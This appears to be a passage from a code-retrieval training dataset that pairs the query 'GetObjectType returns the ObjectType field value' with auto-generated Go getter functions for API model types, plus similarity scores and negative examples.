{\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexVmSnapshotInfoAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexClusterHealthCheckExecutionSnapshot) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *EquipmentBaseSensor) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowWorkflowDefinitionAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *FeedbackFeedbackPost) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *NiatelemetryNicc) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexServerFirmwareVersionEntryAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *VirtualizationVmwareVirtualMachineAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexMapClusterIdToProtectionInfoAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *NiatelemetryDigitalOpticalMonitoring) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowServiceItemActionInstance) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *NiatelemetryNveVni) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageHitachiVolumeMigrationPair) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *NiaapiRevisionInfoAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowCatalogServiceRequest) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *ApplianceSetupInfoAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *NetworkDns) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *InventoryBase) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *IamLdapConfigParamsAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *ApplianceGroupOpStatus) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *EquipmentLocatorLed) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageNetAppHighAvailability) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *InventoryBaseAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *IamLdapBasePropertiesAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *IamUserPreferenceAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowSolutionActionDefinition) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowCliCommandAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *ForecastModelAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *EquipmentIoCardBase) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageEnclosure) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageHitachiPortAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowServiceItemInputDefinitionType) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *OnpremUpgradeNoteAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageFlexUtilVirtualDrive) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *SearchTagItem) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *ConvergedinfraServerComplianceDetailsAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageSasExpander) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *IaasDeviceStatusAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *UcsdBackupInfoAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageNetAppSnapshotPolicySchedule) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *CloudVolumeInstanceAttachment) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *NiaapiNewReleaseDetailAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageHyperFlexStorageContainer) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *BulkResult) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *WorkflowServiceItemDefinitionAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *ResourcepoolPoolMember) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *FabricFlowControlPolicyAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *ConnectorXmlApiMessageAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *ApplianceDeviceClaimAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *IamLdapProviderAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageSpaceAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *EtherPhysicalPort) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *FcNeighborAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *CapabilityChassisUpgradeSupportMeta) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageFlexFlashVirtualDrive) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *HyperflexHxapDvUplink) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *ConnectorpackUpgradeImpact) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageVdMemberEpAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *NetworkLicenseFile) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *FirmwareSwitchUpgrade) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *MacpoolLeaseAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *NotificationAccountSubscriptionAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *EtherHostPort) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *OsInstallAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *IppoolPoolMember) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *MemoryPersistentMemoryConfiguration) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *SdwanRouterNode) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *TechsupportmanagementEndPointAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *KvmPolicyInventory) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *OnpremUpgradePhase) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageExternalParityGroupAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StoragePhysicalDisk) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *StorageHitachiParityGroupAllOf) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *IamIpAddress) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}", "func (o *IamPermissionToRoles) GetClassIdOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ClassId, true\n}" ]
[ "0.8520176", "0.85088193", "0.8484955", "0.8456971", "0.8439255", "0.84268135", "0.8389569", "0.83846575", "0.83810383", "0.8377874", "0.834479", "0.83446074", "0.8341213", "0.8340647", "0.833887", "0.8331335", "0.8326145", "0.83172673", "0.8313973", "0.8308813", "0.8304241", "0.8299871", "0.82901216", "0.82885766", "0.82879585", "0.82782686", "0.8275823", "0.82712394", "0.8262818", "0.82612467", "0.8259711", "0.8257873", "0.8255929", "0.8251744", "0.8250787", "0.8248158", "0.8242539", "0.8241572", "0.8241485", "0.8239777", "0.82303035", "0.82300407", "0.8227531", "0.8221036", "0.82157", "0.82150817", "0.8210776", "0.82098454", "0.8205991", "0.8204672", "0.8204543", "0.8190328", "0.81840175", "0.81769264", "0.8170319", "0.8168788", "0.8167572", "0.8160773", "0.8153179", "0.8150724", "0.8146794", "0.8146614", "0.8145099", "0.8144751", "0.814188", "0.8140065", "0.8138272", "0.81356937", "0.81328046", "0.813278", "0.81266266", "0.81250143", "0.8116818", "0.811606", "0.8108917", "0.8107703", "0.8106747", "0.81058824", "0.8103177", "0.81028646", "0.81000155", "0.80994886", "0.809921", "0.8095896", "0.809406", "0.8093625", "0.80923015", "0.80920273", "0.8091081", "0.80768985", "0.8072935", "0.80689687", "0.8058862", "0.8056594", "0.80509853", "0.8048775", "0.8044122", "0.8042325", "0.8030694", "0.8026996" ]
0.81884634
52
SetClassId sets field value
func (o *CloudAwsVirtualMachineAllOf) SetClassId(v string) { o.ClassId = v }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (m *CalendarGroup) SetClassId(value *i561e97a8befe7661a44c8f54600992b4207a3a0cf6770e5559949bc276de2e22.UUID)() {\n err := m.GetBackingStore().Set(\"classId\", value)\n if err != nil {\n panic(err)\n }\n}", "func (m *EducationAssignment) SetClassId(value *string)() {\n m.classId = value\n}", "func (o *SdwanRouterNode) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexReplicationPlatDatastore) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageSasExpander) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageRemoteKeySetting) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *MemoryArrayAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *WorkflowSshCmd) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *VirtualizationIweHost) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *CapabilitySiocModuleManufacturingDef) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageEnclosure) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexMapClusterIdToProtectionInfoAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageFlexUtilVirtualDrive) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *OpenapiTaskGenerationResult) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexHxapDvUplink) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *FirmwareHttpServer) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexServerFirmwareVersionEntryAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexEncryption) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexSoftwareVersionPolicy) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageHitachiVolumeMigrationPair) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *SoftwarerepositoryLocalMachineAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NiatelemetryNexusDashboardsAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *WorkflowCustomDataProperty) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *BulkResult) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NiaapiRevisionInfoAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *IamLdapProviderAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *WorkflowCliCommandAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *IppoolPoolMember) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *IamLdapBasePropertiesAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *CloudVolumeInstanceAttachment) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageHitachiPortAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *MemoryPersistentMemoryNamespaceConfigResult) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *IamLdapConfigParamsAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *ServerConfigImportAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *VirtualizationIweClusterAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *WorkflowBuildTaskMeta) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageBaseCapacity) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StoragePhysicalDiskExtension) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StoragePhysicalDisk) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *VirtualizationIweVirtualMachine) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NiatelemetryMsoTenantDetailsAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *RackUnitPersonality) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *KubernetesAddonDefinitionAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *WorkflowServiceItemInputDefinitionType) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *EtherHostPort) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageFlexFlashVirtualDrive) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *SoftwarerepositoryCategoryMapper) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NiatelemetryDigitalOpticalMonitoring) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageVdMemberEpAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *InventoryBase) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NiatelemetryEqptcapacityPolUsage5minAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexVmSnapshotInfoAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageSpaceAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *MemoryPersistentMemoryConfiguration) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *WorkflowCatalogServiceRequest) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *VirtualizationVmwareVirtualMachineAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *AssetWorkloadOptimizerGoogleCloudPlatformBillingOptions) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HclFirmware) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *WorkflowSshCmdAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexVirtualMachineAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *EquipmentBaseSensor) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *KubernetesEthernetMatcher) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StoragePhysicalDiskAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NiaapiNewReleaseDetailAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageNetAppCloudTargetAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *WorkflowServiceItemDefinitionAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *FabricFlowControlPolicyAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageHyperFlexStorageContainer) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageHitachiParityGroupAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *WorkflowSolutionActionDefinition) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *ConvergedinfraServerComplianceDetailsAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NiatelemetryNicc) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexSnapshotStatus) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *OpenapiProcessFileAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *ApplianceSetupInfoAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NetworkDns) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *ForecastModelAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *IamServiceProviderAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *MacpoolLeaseAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NetworkLicenseFile) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *TechsupportmanagementEndPointAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NiatelemetrySwitchDiskUtilization) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexHealthCheckNodeLevelInfoAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *ConvergedinfraBasePod) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *AssetNewRelicCredential) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageNetAppSnapshotPolicySchedule) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *WorkflowWorkflowDefinitionAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *NiatelemetryNveVni) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *VnicEthAdapterPolicyInventory) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *InventoryBaseAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *ComputeBladeIdentityAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageExternalParityGroupAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexHealthCheckPackageChecksum) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *ConnectorXmlApiMessageAllOf) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *HyperflexClusterHealthCheckExecutionSnapshot) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *EtherPhysicalPort) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *EquipmentIoCardBase) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *IamPermissionToRoles) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *StorageNetAppHighAvailability) SetClassId(v string) {\n\to.ClassId = v\n}", "func (o *MacpoolPoolMemberAllOf) SetClassId(v string) {\n\to.ClassId = v\n}" ]
[ "0.85037047", "0.82204956", "0.72214776", "0.71519536", "0.7151659", "0.7143244", "0.71351653", "0.7104146", "0.7075165", "0.70544344", "0.6971573", "0.6959524", "0.69535536", "0.692626", "0.6908265", "0.6888364", "0.688603", "0.6885786", "0.68850553", "0.68744624", "0.6865367", "0.68568623", "0.6849119", "0.68437004", "0.6843502", "0.68390304", "0.6835543", "0.6831834", "0.6823876", "0.68125796", "0.68056583", "0.68034273", "0.6786845", "0.67818177", "0.67792356", "0.67758554", "0.6773989", "0.67702746", "0.67698586", "0.6768964", "0.6768465", "0.6762543", "0.6760447", "0.67603534", "0.67598253", "0.6759268", "0.67541575", "0.67454123", "0.67379373", "0.6733215", "0.67310303", "0.67294055", "0.6722331", "0.67199254", "0.6715589", "0.67155564", "0.67084813", "0.6707172", "0.670712", "0.670388", "0.67018706", "0.66957825", "0.6693606", "0.6685618", "0.6677108", "0.6675485", "0.66740745", "0.66649", "0.6658017", "0.6656367", "0.66543657", "0.66525257", "0.66518754", "0.66509986", "0.6649518", "0.66432256", "0.6642682", "0.6640861", "0.66346806", "0.66251117", "0.6624533", "0.6622436", "0.6617529", "0.66142654", "0.66138256", "0.66133666", "0.66070116", "0.6601928", "0.65899944", "0.658957", "0.6577436", "0.6576813", "0.6572477", "0.6570667", "0.6561022", "0.65560573", "0.6553682", "0.65526366", "0.65483356", "0.65475935" ]
0.66834724
64
GetObjectType returns the ObjectType field value
func (o *CloudAwsVirtualMachineAllOf) GetObjectType() string { if o == nil { var ret string return ret } return o.ObjectType }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *VirtualizationIweHost) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StorageSpaceAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HclFirmware) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *StorageNetAppHighAvailability) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowWorkflowDefinitionAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *ServerConfigImportAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *EquipmentFanModule) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *NiaapiRevisionInfoAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *EquipmentFanControl) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *ForecastModelAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *ComputeBladeIdentityAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowCliCommandAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *FeedbackFeedbackPost) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *VirtualizationIweVirtualMachine) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *FcNeighborAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *RackUnitPersonality) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *IamLdapBasePropertiesAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowServiceItemDefinitionAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowCustomDataProperty) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *FirmwareHttpServer) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *CloudInstanceTypeAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HyperflexVmSnapshotInfoAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HyperflexReplicationPlatDatastore) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *ApplianceSetupInfoAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *SearchTagItem) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *InventoryBaseAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowCatalogServiceRequest) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *HyperflexSoftwareVersionPolicy) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *WorkflowSshCmd) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o *OsInstallAllOf) GetObjectType() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.ObjectType\n}", "func (o 